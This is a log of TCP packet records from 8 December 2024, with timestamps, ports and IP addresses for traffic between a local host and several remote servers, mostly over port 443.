Dec 8, 2024 13:31:26.762931108 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.771190882 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.771204948 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.771261930 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.771276951 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.771321058 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.780776978 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.780791998 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.780854940 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.780863047 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.780900955 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.784184933 CET	443	49755	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.784250021 CET	443	49755	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.784313917 CET	49755	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:26.784543037 CET	49755	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:26.784563065 CET	443	49755	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.784591913 CET	49755	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:26.784599066 CET	443	49755	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.787343979 CET	49770	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:26.787378073 CET	443	49770	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.787448883 CET	49770	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:26.787637949 CET	49770	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:26.787656069 CET	443	49770	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.797749043 CET	443	49757	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.797801971 CET	443	49757	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.797930002 CET	49757	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:26.797965050 CET	49757	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:26.797981977 CET	443	49757	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.797995090 CET	49757	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:26.798000097 CET	443	49757	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.800602913 CET	49771	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:26.800626993 CET	443	49771	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.800717115 CET	49771	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:26.800836086 CET	49771	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:26.800847054 CET	443	49771	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:26.905052900 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.905075073 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.905133009 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.905150890 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.905209064 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.911587000 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.911602020 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.911664963 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.911672115 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.911712885 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.918200016 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.918215990 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.918271065 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.918277979 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.918315887 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.925637007 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.925652981 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.925694942 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.925700903 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.925801992 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.933094978 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.933110952 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.933165073 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.933171988 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.933211088 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.940488100 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.940504074 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.940552950 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.940558910 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.940594912 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.940625906 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.948185921 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.948201895 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.948257923 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.948266029 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.948296070 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.948323965 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.955066919 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.955082893 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.955136061 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.955142021 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:26.955190897 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.955210924 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:26.996747971 CET	443	49761	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:26.997003078 CET	49761	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:26.997023106 CET	443	49761	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:26.997703075 CET	443	49762	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:26.997886896 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:26.998023033 CET	49762	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:26.998048067 CET	443	49762	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:26.998060942 CET	443	49761	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:26.998112917 CET	49761	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:26.998202085 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:26.998209000 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:26.998393059 CET	443	49764	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:26.999043941 CET	443	49762	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:26.999102116 CET	49762	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:26.999198914 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:26.999250889 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:26.999432087 CET	49764	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:26.999449015 CET	443	49764	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.000411987 CET	443	49764	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.000494003 CET	49764	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.001677036 CET	49761	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.001744032 CET	443	49761	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.001955986 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.002015114 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.002100945 CET	49762	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.002166033 CET	443	49762	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.002192020 CET	49761	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.002198935 CET	443	49761	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.002585888 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.002593040 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.002650976 CET	49762	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.002660990 CET	443	49762	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.003202915 CET	49764	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.003257036 CET	443	49764	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.003479958 CET	49764	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.003485918 CET	443	49764	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.047533035 CET	49761	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.047550917 CET	49764	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.047552109 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.047594070 CET	49762	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.095375061 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:27.095400095 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:27.095459938 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:27.095472097 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:27.095504999 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:27.095524073 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:27.099826097 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:27.099862099 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:27.099895000 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:27.099901915 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:27.099926949 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:27.099940062 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:27.099958897 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:27.134253025 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:27.134274006 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:27.226247072 CET	49761	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.226316929 CET	443	49761	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.226450920 CET	443	49761	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.226502895 CET	49761	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.226521969 CET	49761	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.379784107 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:27.380023003 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:27.442954063 CET	443	49767	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:27.446664095 CET	49767	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:27.446681023 CET	443	49767	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:27.447180033 CET	49767	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:27.447185040 CET	443	49767	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:27.833136082 CET	443	49762	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.833280087 CET	443	49762	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.833369970 CET	49762	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.835084915 CET	49762	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.835105896 CET	443	49762	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.839699984 CET	443	49764	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.839818001 CET	443	49764	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.839863062 CET	49764	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.841367960 CET	49764	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.841382027 CET	443	49764	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.859114885 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.859169960 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.859201908 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.859230995 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.859256983 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.859280109 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.859350920 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.868844032 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.868900061 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.868913889 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.873059034 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.873456955 CET	443	49768	20.234.120.54	192.168.2.6
Dec 8, 2024 13:31:27.873548031 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.873557091 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.873596907 CET	49768	443	192.168.2.6	20.234.120.54
Dec 8, 2024 13:31:27.878767967 CET	443	49767	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:27.878823996 CET	443	49767	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:27.878880024 CET	49767	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:27.885646105 CET	49767	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:27.885662079 CET	443	49767	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:27.885670900 CET	49767	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:27.885679007 CET	443	49767	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:27.888731956 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.888791084 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.888804913 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.900060892 CET	49773	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:27.900090933 CET	443	49773	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:27.900178909 CET	49773	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:27.900417089 CET	49773	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:27.900432110 CET	443	49773	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:27.902354002 CET	49768	443	192.168.2.6	20.234.120.54
Dec 8, 2024 13:31:27.902365923 CET	443	49768	20.234.120.54	192.168.2.6
Dec 8, 2024 13:31:27.902582884 CET	49768	443	192.168.2.6	20.234.120.54
Dec 8, 2024 13:31:27.902590036 CET	443	49768	20.234.120.54	192.168.2.6
Dec 8, 2024 13:31:27.938338995 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.938353062 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:27.962451935 CET	49774	443	192.168.2.6	20.12.23.50
Dec 8, 2024 13:31:27.962481022 CET	443	49774	20.12.23.50	192.168.2.6
Dec 8, 2024 13:31:27.962611914 CET	49774	443	192.168.2.6	20.12.23.50
Dec 8, 2024 13:31:27.965027094 CET	49774	443	192.168.2.6	20.12.23.50
Dec 8, 2024 13:31:27.965042114 CET	443	49774	20.12.23.50	192.168.2.6
Dec 8, 2024 13:31:27.984761953 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:27.984776974 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.032174110 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.046596050 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.054265022 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.054339886 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.054358959 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.067532063 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.067600012 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.067616940 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.080825090 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.080895901 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.080908060 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.094343901 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.094417095 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.094432116 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.108114004 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.108176947 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.108190060 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.121814013 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.121876001 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.121891975 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.130740881 CET	443	49756	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.131530046 CET	49756	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.131566048 CET	443	49756	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.132116079 CET	49756	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.132122993 CET	443	49756	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.134943008 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.135025978 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.135037899 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.148700953 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.148848057 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.148861885 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.167062998 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.167119026 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.167133093 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.174824953 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.174957991 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.174971104 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.188302994 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.188352108 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.188365936 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.234791994 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.234807014 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.244409084 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.244452953 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.244467974 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.253561020 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.253701925 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.253712893 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.256042004 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.256098032 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.256104946 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.265996933 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.266089916 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.266100883 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.278789997 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.278867006 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.278878927 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.289583921 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.289653063 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.289664030 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.301297903 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.301381111 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.301392078 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.313347101 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.313421965 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.313433886 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.324400902 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.324471951 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.324484110 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.330830097 CET	443	49769	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.331178904 CET	49769	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.331204891 CET	443	49769	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.331741095 CET	49769	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.331746101 CET	443	49769	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.336023092 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.336067915 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.336081028 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.343333960 CET	443	49768	20.234.120.54	192.168.2.6
Dec 8, 2024 13:31:28.343398094 CET	49768	443	192.168.2.6	20.234.120.54
Dec 8, 2024 13:31:28.343534946 CET	443	49768	20.234.120.54	192.168.2.6
Dec 8, 2024 13:31:28.343573093 CET	443	49768	20.234.120.54	192.168.2.6
Dec 8, 2024 13:31:28.343630075 CET	49768	443	192.168.2.6	20.234.120.54
Dec 8, 2024 13:31:28.347202063 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.347250938 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.347265005 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.358597040 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.358732939 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.358745098 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.362262011 CET	49768	443	192.168.2.6	20.234.120.54
Dec 8, 2024 13:31:28.362282991 CET	443	49768	20.234.120.54	192.168.2.6
Dec 8, 2024 13:31:28.362334967 CET	49768	443	192.168.2.6	20.234.120.54
Dec 8, 2024 13:31:28.362421036 CET	49768	443	192.168.2.6	20.234.120.54
Dec 8, 2024 13:31:28.368525982 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.368578911 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.368591070 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.377007008 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.377078056 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.377090931 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.392349005 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.392409086 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.392426968 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.396828890 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.396898985 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.396909952 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.404815912 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.404865026 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.404875040 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.415380955 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.415462971 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.415476084 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.421780109 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.421818018 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.421828985 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.430496931 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.430583000 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.430597067 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.436767101 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.436816931 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.436829090 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.443932056 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.443970919 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.443984032 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.447954893 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.448023081 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.448034048 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.453159094 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.453279972 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.453295946 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.458337069 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.458404064 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.458414078 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.463857889 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.463934898 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.463947058 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.469928980 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.470072031 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.470083952 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.474632978 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.474682093 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.474690914 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.481889963 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.481950998 CET	49763	443	192.168.2.6	172.217.21.36
